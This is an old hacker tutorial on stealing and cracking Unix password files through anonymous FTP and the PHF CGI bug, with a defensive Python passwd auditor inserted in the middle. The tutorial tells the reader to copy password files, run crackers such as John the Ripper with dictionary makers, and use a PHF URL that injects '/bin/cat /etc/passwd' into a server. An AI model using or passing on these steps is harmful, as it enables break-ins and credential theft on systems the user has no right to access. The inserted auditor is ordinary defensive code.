Getting the Password File Through FTP
OK, one of the easiest ways of getting superuser access is through
anonymous FTP access into a web page. First you need to learn a little about
the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That is the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little
difference: it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker (both explained later in the text). Below is
another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password, or sometimes
they are disguised as a * as well.
Now that you know a little more about what the actual password file looks
like, you should be able to tell a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.
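Added example, not part of the original text: a defender-side audit of passwd-format lines in Python that tells shadowed placeholders ("x", "*") from in-file hashes and also flags empty password fields and extra UID-0 accounts, such as the smtp entry in the listing above. The function names, finding labels and sample lines are constructed for illustration; treating a leading "!" as a locked marker is an assumption beyond what the page states.

```python
"""Audit passwd-format lines: in-file hashes, empty passwords, extra UID-0 accounts."""
from typing import NamedTuple, Optional

class Entry(NamedTuple):
    name: str
    pw_field: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

def parse_line(line: str) -> Optional[Entry]:
    """Return an Entry, or None if the line is not a usable passwd record."""
    f = line.strip().split(":")
    if len(f) == 6:              # tolerate a missing trailing colon (empty shell)
        f.append("")
    if len(f) != 7 or not f[0] or not (f[2].isdecimal() and f[3].isdecimal()):
        return None
    return Entry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6])

def audit(lines):
    """Return a list of (line_number, finding, detail) tuples."""
    findings = []
    for n, raw in enumerate(lines, 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue             # skip blanks and comments
        e = parse_line(raw)
        if e is None:
            findings.append((n, "malformed", raw.strip()))
            continue
        if e.pw_field == "":
            findings.append((n, "empty-password", e.name))
        elif e.pw_field != "x" and e.pw_field[0] not in "*!":
            # Not a shadow placeholder: the hash sits in a world-readable file.
            findings.append((n, "hash-in-passwd", e.name))
        if e.uid == 0 and e.name != "root":
            findings.append((n, "extra-uid0", e.name))
    return findings

# Constructed sample, modelled on the listings above.
SAMPLE = [
    "root:x:0:1:Superuser:/:/bin/csh",
    "smtp:x:0:0:mail daemon user:/:",
    "bbob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh",
    "guest::1130:20:Guest:/tmp:/bin/sh",
    "ftp:*:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false",
    "ftpadmin:x:203:102:ftp Administrator:/u1/ftp",
    "broken:line",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```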
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1. The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker, there are a few OK ones out there. I recommend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file... When you start a
cracking prog you will be asked to find the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net. A dictionary maker finds all the possible letter
combinations with the alphabet that you choose (ASCII, caps, lowercase, and
numeric letters may also be added). We will be releasing our password file
to the public soon; it will be called Psychotic Candy, "The Perfect Drug."
As far as we know, it will be one of the largest in circulation. 3. You then
start up the cracker and follow the directions that it gives you.
The PHF Technique
Well, I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf,
I decided to include it.
The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). To do the phf, all you do
is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file (if it works).